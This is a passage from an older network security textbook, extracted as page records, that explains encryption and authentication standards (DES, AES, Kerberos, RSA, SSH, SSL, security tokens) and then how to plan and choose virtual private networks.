key without trying all possible keys. The strength of DES encryption–based security \nrests on the size of the key and on the proper protection of the key. While the original DES standard has been \nbroken in brute force attacks of only three days, the new Triple DES standard should remain secure for many years \nto come. \nAdvanced Encryption Standard (AES) \nAdvanced Encryption Standard (AES) is the follow-up to DES. AES is designed to overcome the deficiencies of \nDES (encryption weakness, key length restrictions, and device-specific application) while providing a framework \nfor future technological advancements. While AES is not set to be a full standard until summer of 2001, NIST \n(National Institute of Standards and Technology) announced on October 2, 2000 that the Rijndael algorithm would \nbe at the core of the replacement to DES. Rijndael is a variable length block cipher, but its implementation in AES \nwill initially be in key lengths of 128, 192, and 256 bits. \nNIST chose Rijndael because it performed well not just on Pentium-class machines, but also on smart cards. \nCombined with the ability to use variable length keys and other encryption features, NIST has decided that \nRijndael is the best of all five standards submitted for final AES evaluation. \nDigital Certificate Servers \nAs you saw in the section on public and private cipher keys, a private key can be used to create a unique digital \nsignature. This signature can then be verified later with the public key in order to insure that the signature is \n" }, { "page_number": 198, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 198\nauthentic. This process provides a very strong method of authenticating a user’s identity. A digital certificate \nserver provides a central point of management for multiple public keys. This prevents every user from having to \nmaintain and manage copies of every other user’s public cipher key. A Lotus Notes server will act as a digital \ncertificate server, allowing users to sign messages using their private keys. The Notes server will then inform the \nrecipient on delivery whether the Notes server could verify the digital signature. \nDigital certificate servers, also known as certificate authorities (CA), provide verification of digital signatures. For \nexample, if Toby receives a digitally signed message from Lynn but does not have a copy of Lynn’s public cipher \nkey, Toby can obtain a copy of Lynn’s public key from the CA in order to verify that the message is authentic. \nAlso, let’s assume that Toby wishes to respond to Lynn’s e-mail but wants to encrypt the message in order to \nprotect it from prying eyes. Toby can again obtain a copy of Lynn’s public key from the CA, so that the message \ncan be encrypted using Lynn’s public key. \nCertificate servers can even be used to provide single sign-on and access control. Certificates can be mapped to \naccess control lists for files stored on a server in order to restrict access. When a user attempts to access a file, the \nserver verifies that the user’s certificate has been granted access. This allows a CA to manage nearly all document \nsecurity for an organization. \n Note \nNetscape Certificate Server is a good example of a CA that supports file-level access control. \nThe largest benefit comes from using a CA that supports X.509, an industry standard format for digital certificates. \nThis allows certificates to be verified and information to be encrypted between organizations. If the predominant \nmethod of exchanging information between two domains is e-mail, a CA may be far more cost effective than \ninvesting in virtual private networking. \nIP Security (IPSec) \nIP Security (IPSec) is public/private key encryption algorithm that is being spearheaded by Cisco Systems. It is \nnot so much a new specification as a collection of open standards. IPSec uses a Diffie-Hellman exchange in order \nto perform authentication and establish session keys. IPSec also uses a 40-bit DES algorithm in order to encrypt \nthe data stream. IPSec has been implemented at the session layer, so it does not require direct application support. \nUse of IPSec is transparent to the end user. \nOne of the benefits of IPSec is that it is very convenient to use. Since Cisco has integrated IPSec into its router line \nof products, IPSec becomes an obvious virtual private network (VPN) solution. While IPSec is becoming quite \npopular for remote network access from the Internet, the use of a 40-bit DES algorithm makes it most suited for \ngeneral business use. Organizations that need to transmit sensitive or financial data over insecure channels may be \nprudent to look for a different encryption technology. \nKerberos \nKerberos is another authentication solution, which is designed to provide a single sign-on to a heterogeneous \nenvironment. Kerberos allows mutual authentication and encrypted communication between users and services. \nUnlike security tokens, however, Kerberos relies on each user to remember and maintain a unique password. \nWhen a user authenticates to the local operating system, a local agent sends an authentication request to the \nKerberos server. The server responds by sending the encrypted credentials for the user attempting to authenticate \nto the system. The local agent then tries to decrypt the credentials using the user-supplied password. If the correct \npassword has been supplied, the user is validated and given authentication tickets, which allow the user to access \nother Kerberos-authenticated services. The user is also given a set of cipher keys that can be used to encrypt all \ndata sessions. \nOnce the user is validated, she is not required to authenticate with any Kerberos-aware servers or applications. The \ntickets issued by the Kerberos server provide the credentials required to access additional network resources. This \nmeans that while the user is still required to remember her password, she only needs one password to access all \nsystems on the network to which she has been granted access. \nOne of the biggest benefits of Kerberos is that it is freely available. The source code can be downloaded and used \nwithout cost. There are also many commercial applications, such as IBM’s Global Sign-On (GSO) product, which \nare Kerberos-compatible but sport additional features and improved management. A number of security flaws \nhave been discovered in Kerberos over the years, but most, if not all, have been fixed as of Kerberos V. \n" }, { "page_number": 199, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 199\nPoint-to-Point Tunneling Protocol vs. \nLayer Two Tunneling Protocol \nA discussion on encryption techniques would not be complete without at least mentioning PPTP and L2TP. \nDeveloped by Microsoft, PPTP uses authentication based on the Point-to-Point Protocol (PPP) and encryption \nbased on a Microsoft algorithm. Microsoft has integrated support for PPTP into both NT Server and Windows \n95/98. \nMany within the cryptography field refer to PPTP as kindergarten crypto. This is due to the relative ease in which \npeople have broken both the authentication mechanism and the encryption algorithm. There are a number of tools \navailable on the Internet that will capture password information within a PPTP session. This is a bit disappointing, \nconsidering that PPTP is less than four years old. With so many tools available that will break PPTP, it is of little \nuse as a protocol for protecting your data. \n Note \nFor additional information on the insecurities of PPTP, check out http://underground.org/ \nLayer Two Tunneling Protocol (L2TP) was designed by taking the best parts of PPTP and Cisco’s L2F (Layer \nTwo Firewall). Most commonly used with IPSec, L2TP focuses on creating the tunnel between two points and \nleaves encryption tasks to IPSec (or whatever encryption algorithm you’ve chosen). As a result, L2TP has the \nfollowing advantages over PPTP: \n• \nLT2P can work over any packet point-to-point network, including Frame Relay, X.25, and \nATM. \n• \nL2TP can create multiple tunnels between a single pair of endpoints. \n• \nL2TP can compress its header information. \n• \nL2TP can provide its own tunnel authentication, (not necessary when using L2TP with \nIPSec). \nRemote Access Dial-In User Service (RADIUS) \nRADIUS allows multiple remote access devices to share the same authentication database. This provides a central \npoint of management for all remote network access. When a user attempts to connect to a RADIUS client (such as \na terminal access server), he is challenged for a logon name and password. The RADIUS client then forwards \nthese credentials to the RADIUS server. If the credentials are valid, the server returns an affirmative reply and the \nuser is granted access to the network. If the credentials do not match, the RADIUS server will reply with a \nrejection, causing the RADIUS client to drop the user’s connection. \nRADIUS has been used predominantly for remote modem access to a network. Over the years, it has enjoyed \nwidespread support from such vendors as 3COM, Cisco, and Ascend. RADIUS is also starting to become accepted \nas a method for authenticating remote users who are attempting to access the local network through a firewall. \nSupport for RADIUS has been added to Check Point’s FireWall-1 and Cisco’s PIX firewall. \nThe biggest drawback to using RADIUS for firewall connectivity is that the specification does not include \nencryption. This means that while RADIUS can perform strong authentication, it has no process for insuring the \nintegrity of your data once the session is established. If you do use RADIUS authentication on the firewall, you \nwill need an additional solution in order to provide encryption. \nRSA Encryption \nThe RSA encryption algorithm was created by Ron Rivest, Adi Shamir, and Leonard Adleman in 1977. RSA is \nconsidered the de facto standard in public/private key encryption: it has found its way into products from \nMicrosoft, Apple, Novell, Sun, and even Lotus. As a public/private key scheme, it is also capable of performing \nauthentication. \nThe fact that RSA is widely used is important when considering interoperability. You cannot authenticate or \ndecrypt a message if you are using a different algorithm from the algorithm used to create it. Sticking with a \nproduct which supports RSA helps to insure that you are capable of exchanging information with a large base of \nusers. The large installation base also means that RSA has received its share of scrutiny over the years. This is also \nan important consideration when you are selecting an algorithm to protect your data. \n" }, { "page_number": 200, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 200\nRSA encryption is owned by RSA Laboratories, which in turn is owned by Security Dynamics. The patent for the \nRSA algorithm was issued in 1983 and will expire in the year 2000. While RSA Labs still holds control of the \npatent, the company has been quite generous in the number of institutions to which it has made the technology \nfreely available. RSA Labs has even published source code, which is freely available for noncommercial use. \nHashing \nDigital signatures typically work by signing the entire message using a private key. This can be cumbersome and \ntime consuming. An alternative is to create a message digest, and then sign (or encrypt) the message digest \n(sometimes referred to as a hash) with a private key, thus achieving the same effect as signing the entire message. \nThis all starts with the hashing algorithm, a mathematical process that takes an original file and creates a digital \nsummary known as a message digest. The message digest is then signed (encrypted) by a private key and \ntransmitted. The receiver applies the public key of the signer to the encrypted message digest to verify the identity \nof the receiver. The receiver then processes the original file using the same hashing algorithm as the sender, and \ncompares the resulting message digest with the original. If they match, the receiver can be assured that the \nmessage has not been altered in transit. \nSHA-1 \nCreated by NIST (National Institute for Standards and Technology), SHA-1 (Secure Hash Algorithm) is part of the \nU.S. Government’s DSS standard, and works with DES to create digital signatures. Released in 1994, (to correct \nfor an unpublished flaw in the original SHA), SHA-1 produces a 160-bit message digest. On October 12, 2000, \nNIST announced three new SHA-based algorithms to work with the new AES (Advanced Encryption Standard) \nthat will replace DES in 2001. SHA-256, SHA-384, and SHA-512 will work with the three different AES key \nsizes (128, 192, and 256 bits). \nMD5 \nCreated by Professor Robert Rivest of MIT in 1991, MD5 is the latest in the MD-series of hash algorithms. \nExplicitly designed to run on 32-bit processors, MD5 produces a 128-bit digest. MD5 is a faster, although not as \nsecure, alternative to SHA-1. \nSecure Shell (SSH) \nSecure Shell (SSH) is a powerful method of performing client authentication and safeguarding multiple service \nsessions between two systems. Written by a Finnish student named Tatu Yl nen, SSH has received widespread \nacceptance within the UNIX world. The protocol has even been ported to Windows and OS/2. \nSystems running SSH listen on port 22 for incoming connection requests. When two systems running SSH \nestablish a connection, they validate each other’s credentials by performing a digital certificate exchange using \nRSA. Once the credentials for each system have been validated, triple DES is used to encrypt all information that \nis exchanged between the two systems. The two hosts will authenticate each other in the course of the \ncommunication session and periodically change encryption keys. This helps to insure that brute force or playback \nattacks are not effective. \nSSH is an excellent method of securing protocols that are known to be insecure. For example, telnet and FTP \nsessions exchange all authentication information in the clear. SSH can encapsulate these sessions to insure that no \nclear text information is visible. \nSecure Sockets Layer (SSL) \nCreated by Netscape, Secure Sockets Layer (SSL) provides RSA encryption at the session layer of the OSI model. \nBy encrypting at the session layer, SSL has the ability to be service independent. Although SSL works equally \nwell with FTP, HTTP, and even telnet, the main use of SSL is in secure Web commerce. Since the RSA \nencryption is a public/private key encryption, digital certificates are also supported. This allows SSL to \nauthenticate the server and optionally authenticate the client. \nNetscape includes SSL in its Web browser and Web server products. Netscape has even provided source code so \nthat SSL can be adapted to other Web server platforms. A Webmaster developing a Web page can flag the page as \n" }, { "page_number": 201, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 201\nrequiring an SSL connection from all Web browsers. This allows online commerce to be conducted in a relatively \nsecure manner. \nThe Internet Engineering Task Force (IETF) is considering a standard based on SSL 3.0 known as the Transport \nLayer Security (TLS) protocol. While the difference between the two will be minimal, TLS will not interoperate \nwith SSL. \nSecurity Tokens \nSecurity tokens, also called token cards (or smart cards), are password-generating devices that can be used to \naccess local clients or network services. Physically, a token is a small device with an LCD display that shows the \ncurrent password and the amount of time left before the password expires. Once the current password expires, a \nnew one is generated. This provides a high level of authentication security, since a compromised password has a \nvery limited life span. Figure 9.7 shows a number of security tokens produced by Security Dynamics \nTechnologies. These tokens are referred to as SecurID cards. \n \nFigure 9.7: SecurID cards from Security Dynamics Technologies \nSecurity tokens do not directly authenticate with an existing operating system or application. An agent is required \nin order to redirect the logon request to an authentication server. For example, FireWall-1 supports inbound client \nauthentication via SecurID. When a user out on the Internet wishes to access internal services protected by \nFireWall-1, she uses her SecurID token to authenticate at the firewall. FireWall-1 does not handle this \nauthentication directly; rather, an agent on the firewall forwards the logon request to a SecurID authentication \nserver, known as an ACE/Server. If the credentials are legitimate, validation is returned to the agent via an \nencrypted session and the user is allowed access to the internal network. \nEach security token is identified by a unit ID number. The unit ID number uniquely identifies each security token \nto the server. The unit ID is also used to modify the algorithm used to generate each password so multiple tokens \nwill not produce the same sequence of passwords. Since passwords expire at regular intervals (usually 60 \nseconds), the security token needs to be initially synchronized with the authentication server. \nThere are a number of benefits to this type of authentication. First, users are no longer required to remember their \npasswords. They simply read the current password from the security token and use this value for authentication. \nThis obviously removes the need to have users change their passwords at regular intervals, because this is done \nautomatically by the security token. Also, it is far less likely that a user will give out his password to another \nindividual because the token is a physical device which needs to be referenced during each authentication attempt. \nEven if a user does read off his password to another user, the consequences are minimized because the password is \nonly valid for a very short period of time. \nSecurity tokens are an excellent means of providing authentication. Their only drawback is that they do not \nprovide any type of session encryption. They rely on the underlying operating system or application to provide this \nfunctionality. For example, this means that authentication information could still be read as clear text if an attacker \nsnoops on a telnet session. Still, the limited life span of any given password makes this information difficult to \ncapitalize on. \nSimple Key Management for Internet Protocols (SKIP) \nSimple Key Management for Internet Protocols (SKIP) is similar to SSL in that it operates at the session level. As \nwith SSL, this gives SKIP the ability to support IP services regardless of whether the services specifically support \nencryption. This is extremely useful when you have multiple IP services running between two hosts. \n" }, { "page_number": 202, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 202\nWhat makes SKIP unique is that it requires no prior communication in order to establish or exchange keys on a \nsession-by-session basis. The Diffie-Hellman public/private algorithm is used to generate a shared secret. This \nshared secret is used to provide IP packet–based encryption and authentication. \nWhile SKIP is extremely efficient at encrypting data, which improves VPN performance, it relies on the long-term \nprotection of this shared secret in order to maintain the integrity of each session. SKIP does not continually \ngenerate new key values, as SSH does. This makes SKIP encryption vulnerable if the keys are not protected \nproperly. \n \nSummary \nIn this chapter, you saw why good authentication is important and what kinds of attacks can be \nlaunched if you do not use it. You also learned about encryption and the differences between secret \nand public/private algorithms. Finally, we looked at a number of authentication and encryption \noptions that are currently available. \nNow that you understand encryption, it is time to put it to use by creating a virtual private network \n(VPN). Extranets have become quite popular, and the ability to create a secure VPN has become a \nstrong business need. \n \nChapter 10: Virtual Private Networking \nNot since the introduction of the Internet has a single technology brought with it so much promise—or so much \ncontroversy. Virtual private networking (VPN) has been touted as the cure-all for escalating WAN expenses, and \nfeared for being the Achilles’ heel in perimeter security. Obviously, the true classification of VPN technology lies \nsomewhere in the middle. \nInterestingly, it has been financial institutions, trading companies, and other organizations at high risk of attack \nthat have spearheaded the deployment of VPN technology. Monetary and economic organizations have embraced \nVPNs in order to extend their network perimeter. \nVPN Basics \nA virtual private network session is an authenticated and encrypted communication channel across some form of \npublic network, such as the Internet. Since the network is considered to be insecure, encryption and authentication \nare used to protect the data while it is in transit. Typically, a VPN is service independent, meaning that all \ninformation exchanged between the two hosts (Web, FTP, SMTP, and so on) is transmitted along this encrypted \nchannel. \nFigure 10.1 illustrates a typical example of a VPN configuration. The figure shows two different networks that are \nboth connected to the Internet. These two networks wish to exchange information, but they want to do so in a \nsecure manner, as some of the data they will be exchanging is private. To safeguard this information, a VPN is set \nup between the two sites. \nVPNs require a bit of advance planning. Before establishing a VPN, the two networks must do the following: \nƒ Each site must set up a VPN-capable device on the network perimeter. This could be a router, a \nfirewall, or a device dedicated to VPN activity. \nƒ Each site must know the IP subnet addresses used by the other site. \nƒ Both sites must agree on a method of authentication and exchange digital certificates if \nrequired. \nƒ Both sites must agree on a method of encryption and exchange encryption keys as required. \n" }, { "page_number": 203, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 203\n \nFigure 10.1: An example of a VPN between two Internet sites \nIn Figure 10.1, the devices at each end of the VPN tunnel are the routers you are using to connect to the Internet. If \nthese are Cisco routers, they are capable of supporting IPSEC, which provides Diffie-Hellman authentication and \n40-bit DES encryption. \nThe router on Network A must be configured so that all outbound traffic headed for the 192.168.2.0 subnet is \nencrypted using DES. This is known as the remote encryption domain. The router on Network A also must know \nthat any data received from the router on Network B will require decryption. The router on Network B would be \nconfigured in a similar fashion, encrypting all traffic headed for the subnet 192.168.1.0 while decrypting any \nreplies received from the router on Network A. Data sent to all other hosts on the Internet is transmitted in the \nclear. It is only communications between these two subnets that will be encrypted. \nNote \nA VPN only protects communications sessions between the two encryption domains. \nWhile it is possible to set up multiple VPNs, you must define multiple encryption \ndomains. \nWith some VPN configurations, a network analyzer placed between the two routers would display all packets \nusing a source and destination IP address of the interfaces of the two routers. You do not get to see the IP address \nof the host that actually transmitted the data, nor do you see the IP address of the destination host. This \ninformation is encrypted along with the actual data within the original packet. Once the original packet is \nencrypted, the router will encapsulate this ciphertext within a new IP packet using its own IP address as the source \nand a destination IP address of the remote router. This is called tunneling. Tunneling helps to insure that a \nsnooping attacker will not be able to guess which traffic crossing the VPN is worth trying to crack, since all \npackets use the two routers’ IP addresses. Not all VPN methods support this feature, but it is nice to use when it is \navailable. \nSince you have a virtual tunnel running between the two routers, you have the added benefit of being able to use \nprivate address space across the Internet. For example, a host on Network A would be able to transmit data to a \nhost on the 192.168.2.0 network without requiring network address translation. This is because the routers \nencapsulate this header information as the data is delivered along the tunnel. When the router on Network B \nreceives the packet, it simply strips off the encapsulating packet, decrypts the original packet, and delivers the data \nto the destination host. \nYour VPN also has the benefit of being platform and service independent. In order to carry on secure \ncommunications, your workstations do not have to use software that supports encryption. This is done \nautomatically as the traffic passes between the two routers. This means that services such as SMTP, which are \ntransmitted in the clear, can be used in a secure fashion—provided the destination host is on the remote encryption \ndomain. \nVPN Usage \nAlthough VPNs are beginning to enjoy a wide deployment, there are only two specific applications for which they \nare being used. These are \nƒ \nReplacement for dial-in modem pools \nƒ \nReplacement for dedicated WAN links \n" }, { "page_number": 204, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 204\nA VPN can replace the listed technology completely or only in specific situations. The limited application is \ngreatly due to the amount of manual configuration that is required in order to configure a VPN. As technology \nevolves, you may see this process become more dynamic. For example, two IPSEC-compatible routers may \ndynamically handshake and exchange keys before passing SMTP traffic. When the delivery process is complete, \nthe VPN could be torn down. While this technology is currently not on the horizon, it is certainly possible. \nModem Pool Replacement \nModem pools have always been the scourge of the network administrator. While there are stable solutions \navailable, these are usually priced beyond the budget of a small to mid-sized organization. Most of us end up \ndealing with modems that go off auto-answer, below-grade wiring, incorrectly configured hunt groups, and the \nsalesperson who is having trouble dialing in because little Timmy deleted some files to make room for another \ngame. For anyone who has been responsible for administering a modem pool, the thought of getting rid of such \nheadaches can bring tears of joy. \nA VPN solution for remote users can dramatically reduce support costs. There are no more phone lines to maintain \nor 800 numbers to pay for. You are not required to upgrade your hardware every time a new modem standard is \nreleased or to upgrade your phone lines to support new technology, such as ISDN. All inbound access is managed \nthrough your Internet connection, a connection your company already maintains in order to do business on the \nInternet. \nAccess costs can be cheaper, as well. For example, many organizations maintain an 800 number in order to allow \nemployees remote access to the network free of charge. This can place a large cost burden on the organization, as \nthe per-minute charge for using an 800 number can be double the cost of calling direct. Most ISPs charge $20 per \nmonth or less for unlimited access. Large ISPs, such as CompuServe, can even provide local dial-up numbers \ninternationally. For heavy remote access users, it may be far more cost effective for an organization to reimburse \nthe employee for an ISP account than it would be to pay 800-number charges. \nBesides reducing infrastructure costs, you can reduce end-user support costs, as well. The most common remote-\naccess Helpdesk problem is helping the end user configure network settings and connect to the network. If the user \nfirst needs to dial in to an ISP, this support can be provided by the ISP providing access. Your organization’s \nHelpdesk only needs to get involved when the user can access resources out on the Internet but is having problems \nconnecting to internal resources. This greatly limits the scope of required support. \nTip \nWhen selecting a firewall solution, consider whether you will be providing end users with \nremote VPN access. Most firewall packages provide special client software so that an end \nuser can create a VPN to the firewall. \nThere are a few drawbacks to consider when deciding whether to provide end users with remote VPN access. The \nfirst is the integrity of the remote workstation. With penetration tools such as L0pht’s Netcat and the Cult of the \nDead Cow’s Back Orifice freely available on the Internet, it is entirely possible that the remote workstation can \nbecome compromised. Most ISPs do not provide any type of firewall for dial-in users. This means that dialed-in \nsystems are wide open to attack. The remote client could be infiltrated by an attacker, who could then use the VPN \ntunnel to attack internal resources. \nThe other drawback is more theoretical. Allowing VPN access into your network requires that you punch another \nhole through your firewall. Every open hole gives attackers that much more room to squirm their way in. For \nexample, NT users who relied on PPTP to provide safe encrypted access to their network were caught off guard \nwhen a vulnerability was found with the PPTP service running on the NT server. By sending the PPTP server a \nsingle PPTP start session request with an invalid packet length value, an attacker could make the server core dump \nand crash. This would bring down the PPTP server, along with any other service running on that system. \nDedicated WAN Link Replacement \nAs you saw in Figure 10.1, a VPN can be used to connect two geographically separate networks over the Internet. \nThis is most advantageous when the two sites are separated by large distances, as when your organization has one \noffice in Germany and another in New York. Instead of having to pay for a dedicated circuit halfway around the \nworld, each site would only be required to connect to a local ISP. The Internet could then be used as a backbone to \nconnect these two networks. \nA VPN connection may even be advantageous when two sites are relatively close to one another. For example, if \nyou have a business partner that you wish to exchange information with but the expected bandwidth does not \njustify a dedicated connection, a VPN tunnel across an already existing Internet connection may be just the ticket. \nIn fact, it may even make life a bit easier. \n" }, { "page_number": 205, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 205\nSystem Capacity Checklist \nIf you will be providing client VPN access to your network, keep a sharp eye on system capacity. Here are some \nquestions you should ask yourself: \nƒ How many concurrent users will there be? More users means you need more capacity. \nƒ When will VPN clients connect remotely to your network? If most remote VPN access \nwill take place during normal business hours, a faster Internet link and faster \nhardware may be required. \nƒ What services will the clients be accessing? If remote VPN access will be for \nbandwidth-intensive applications like file sharing, a faster Internet link and faster \nhardware may be required, as well. \nƒ What kind of encryption do you plan to use? If remote VPN access will be using a large \nkey algorithm, such as TripleDES, then faster encryption hardware may be required. \n \nConsider the network drawing in Figure 10.2. There is an internal network protected by a firewall. There is also a \nDMZ segment which holds your Web server and SMTP relay. Additionally, you have an extra network card in the \nfirewall for managing security to a number of dedicated T1 lines. The T1 circuits connect you to multiple business \npartners and are used so that sensitive information does not cross the Internet. This sensitive information may be \ntransmitted via e-mail or by FTP. \n \nFigure 10.2: A network using dedicated links to safeguard sensitive information \nWhile this setup may appear pretty straightforward on the surface, it could potentially run into a number of \nproblems. The first is routing. Your firewall would need to be programmed with the routing information for each \nof these remote networks. Otherwise, your firewall would simply refer to its default route setting and send this \ntraffic out to the Internet. While these routing entries can be set in advance, how will you be updated if one of the \nremote networks makes a routing or subnet change? While you could use RIP, you have already seen in Chapter 3 \nthat this is a very insecure routing protocol. Open Shortest Path First (OSPF) would be a better choice, but \ndepending on the equipment at the other end of the link, you may not have the option of running OSPF. \nYou may also run into IP address issues. What if one of the remote networks is using NAT with private address \nspace? If you perform a DNS lookup on one of these systems, you will receive the public IP address, not the \nprivate. This means that you may have additional routing issues or you may be required to run DNS entries for \nthese systems locally. Also, what if two or more of the remote networks are using the same private address space? \nYou now may be forced to run NAT on the router at your end of the connection just so your hosts can distinguish \nbetween the two networks. \nThere is also a liability issue here. What if an attacker located at one of your remote business partners launches an \nattack against one of the other remote business partners? You have now provided the medium required for this \n" }, { "page_number": 206, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 206\nattack to take place. Even if you can legally defend yourself, this would certainly cause a lot of embarrassment and \nstrain your business relationships. \nReplacing your dedicated business partner connections with VPNs would resolve each of these problems. As long \nas you can insure the integrity of the data stream, administering multiple VPNs would be far simpler than \nmanaging multiple dedicated circuits. \nAs with remote client access, you must open a hole through your firewall in order to permit VPN traffic. While \nstrong authentication will dramatically decrease the chances that an attacker will be able to exploit this hole, it is a \nhole in your perimeter security just the same. \nSelecting a VPN Product \nWhen deciding which VPN product to use, you should look for several features: \nƒ \nStrong authentication \nƒ \nAdequate encryption \nƒ \nAdherence to standards \nƒ \nIntegration with other network services \nOf course, this assumes that you have a choice when selecting a VPN product. If you are setting up a VPN in order \nto connect to a specific site, your options may be limited. For example, Novell’s firewall product BorderManager \nsupports VPN connectivity. The problem is that the VPN is proprietary. This means that the only way to create a \nVPN with a BorderManager firewall is to place another BorderManager firewall at the other end of the VPN \ntunnel. If you are setting up a VPN in order to communicate with a specific remote network, find out what VPN \npackage that network is using. Then you can determine what your product options are. \nStrong Authentication \nWithout strong authentication, you have no way to determine if the system at the other end of the VPN tunnel is \nwho you think it is. Diffie-Hellman, discussed in Chapter 9, is the authentication method of choice when \nvalidating the tunnel end points. It allows a shared secret to be created through the exchange of public keys. This \nremoves the need to exchange secret information through some alternative means. \nTip \nIf you are not using a known and trusted certificate authority when exchanging public keys \nover the Internet, verify the key values through some other means, such as a phone call or \nfax. \nAdequate Encryption \nNote that the word “adequate”—not “strong”—appears in the title of this section. You should determine what \nlevel of protection you actually require before selecting a method of encryption. For example, if you will be \nexchanging interesting but not necessarily private information over the Internet, 40–56-bit DES encryption may be \nmore than sufficient. If you will be moving financial data or equally valuable information, stick with something \nstronger, like Triple DES. \nThe reason you want to choose the right level of encryption is performance. The stronger the encryption algorithm \nyou use, the larger the delay that will be introduced from the encryption and decryption processes. For example, \ntwo networks connected to the Internet via 56K circuits which are using Triple DES may not be able to pass traffic \nfast enough in order to prevent application timeouts. While it is always better to err on the side of caution by using \na larger key, give some thought to what size key you actually need before assuming bigger is always better. \nThe type of key you use will also affect performance. Secret key encryption, such as DES, is popular with VPNs \nbecause it is fast. Public/private encryption schemes, such as RSA, can be 10 to 100 times slower than secret key \nalgorithms which use the same size key. This is because key management with a public/private scheme requires \nmore processor time. Many VPN products will use a public/private key algorithm in order to initially exchange the \nsecret key, but then use secret key encryption for all future communications. \nTip \nUse the brute force attack time estimates discussed in Chapter 9 as a guide in determining \nwhat size encryption key to use with your VPN. \nAdherence to Standards \nYou saw in Chapter 9 why it is important to stick with encryption schemes that have survived public scrutiny. The \nsame holds true when selecting a method of encryption for your VPN. Stick with an algorithm that has stood the \n" }, { "page_number": 207, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 207\ntest of time and has no significant vulnerabilities. For example, the only real deficiency found with DES is the \nsmall key size used in the original version. This can easily be rectified by using Triple DES, which increases the \nnumber of keys that are used. \nYou should also make sure that the VPN product is compatible with other VPN solutions. As mentioned earlier in \nthis section, Novell BorderManager is only capable of creating VPN connections with other BorderManager \nsystems. This severely limits the product selection at the other end of the tunnel. If you are using BorderManager \nas a firewalling solution and later need to create a VPN to a remote business partner, you may find yourself \npurchasing a separate solution in order to fulfill this need. \nIntegration with Other Network Services \nNewer VPN solutions have the capability to integrate with other services including firewalls, user directories, and \nmonitoring software. Check Point’s VPN-1 is completely integrated into the entire Check Point management suite, \nallowing not just complete security integration, but also address translation and bandwidth allocation. The ability \nto centrally manage the authentication of VPN connections as well as control how much bandwidth each \nconnection is allowed is a powerful feature. \nOf course, the ideal VPN solution would integrate with products from a different vendor. So far, success has been \nlimited—although newer products are including industry standards such as LDAP and Triple DES. \nMicrosoft is such an example. They have included a VPN solution within their Windows 2000 product. The \nadvantage, of course, is the integration of encryption and authentication technologies with Active Directory. Some \nvendors (such as Check Point) can mix their own VPN products with Microsoft VPN, allowing one centrally \ndefined VPN policy to be applied equally to Microsoft and vendor-specific VPN access points. Also, because \nActive Directory is LDAP-compliant, third-party VPN’s can base VPN permissions on the user account \ninformation stored in Active Directory. \nVPN Product Options \nThere are a number of options available to you when you are selecting what kind of device to use for a VPN \nconnection. These options fall into three categories: \nƒ \nFirewall-based VPN \nƒ \nRouter-based VPN \nƒ \nDedicated software or hardware \nThe option you choose will depend on your requirements, as well as on the equipment you have already \npurchased. \nFirewall-Based VPN \nThe most popular VPN solution is firewall integration. Since you will probably want to place a firewall on your \nnetwork perimeter, anyway, it is a natural extension to let this device support your VPN connections, as well. This \nprovides a central point of management as well as direct cohesion between your firewall security policy and the \ntraffic you wish to let through your end of the tunnel. \nThe only drawback is performance. If you have a busy Internet circuit, and you want to use multiple VPNs with \nstrong encryption on all of them, consolidating all of these services on a single box may overload the system. \nWhile this will probably not be an issue for the average installation, you should keep scale and performance in \nmind while you are deciding where to terminate your VPN tunnel. Some firewalls, such as FireWall-1, do support \nencryption cards in order to reduce processor load. The encryption card fits in a standard PCI expansion slot and \ntakes care of all traffic encryption and decryption. In order to use one of these cards, however, you must make sure \nthat all of your PCI slots are not currently being used by network cards. \nRouter-Based VPN \nAnother choice would be your Internet border router. This is yet another device that you need to have installed in \norder to connect to the Internet. Terminating the VPN at your border router will allow you to decrypt the traffic \nstream before it reaches the firewall. While process load is still a concern, many routers now use application-\nspecific integrated circuit (ASIC) hardware. This allows the router to dedicate certain processors for specific tasks, \nthus preventing any one activity from overloading the router. \n" }, { "page_number": 208, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 208\nThe only real drawback to a router-based VPN solution is security. Typically (but not always), routers are \nextremely poor at providing perimeter security compared to the average firewall. It is possible that an attacker may \nbe able to spoof traffic past the router that the firewall will interpret as originating from the other side of the VPN \ntunnel. This means that the attacker may be able to gain access to services that are typically not visible from other \nlocations on the Internet. \nDedicated Hardware or Software \nIf you have already purchased a firewall and router and neither supports VPN ability, all is not lost. You can still \ngo with a hardware or software solution that is dedicated to creating VPN connections. For example, DEC’s \nAltaVista Tunnel is an excellent product which supports tunnels to remote networks and remote-user VPNs. Since \nthis in an independent product, it will work with any existing firewall. \nThe biggest drawback to a dedicated solution is an additional point of administration and security management. If \nthe device is located outside the firewall, you have the same spoofing issues that you had with the router solution. \nIf you locate the device inside the firewall, you may not be able to manage access using your firewall security \npolicy. Most VPN solutions encrypt the original packet in its entirety. This means that the IP header information is \nno longer available to the firewall in order to make traffic control decisions. All traffic passing from one end of the \ntunnel to the other would use the same encapsulating packet headers. This means that the firewall will not be able \nto distinguish between an SMTP and a telnet session encapsulated within the tunnel. You must rely on the \ndedicated VPN device to provide tools to control the type of traffic you wish to let through your end of the tunnel. \nVPN Alternatives \nNot every remote-access solution requires a fully functional VPN. Some applications already provide strong \nencryption and authentication. For example, if you are a Lotus Notes user, your Notes ID file is actually your \nprivate encryption key. This key can be used to create a digital certificate, which, along with password \nauthentication, is used to insure that you are in fact who you claim to be. \nLotus Notes will also encrypt information that it transmits along the network. From the Lotus Notes client main \nmenu, you can select File ¾ Tools ¾ User Preferences ¾ Ports to produce the User Preferences screen shown in \nFigure 10.3. By selecting the Encrypt network data check box, you can optionally encrypt all data transmitted \nthrough the highlighted communication port. In Figure 10.3, all TCP/IP traffic will be encrypted. \n \nFigure 10.3: The Lotus Notes User Preferences screen \nIf your remote network access will be limited to Lotus Notes replication, you could simply open up a port through \nyour firewall and allow Lotus Notes to take care of all authentication and encryption for you. If you do not want to \nleave the Lotus Notes server openly exposed to the Internet, you could force all inbound sessions to authenticate at \nthe firewall first (if your firewall supports this ability). This means that until you authenticate at the 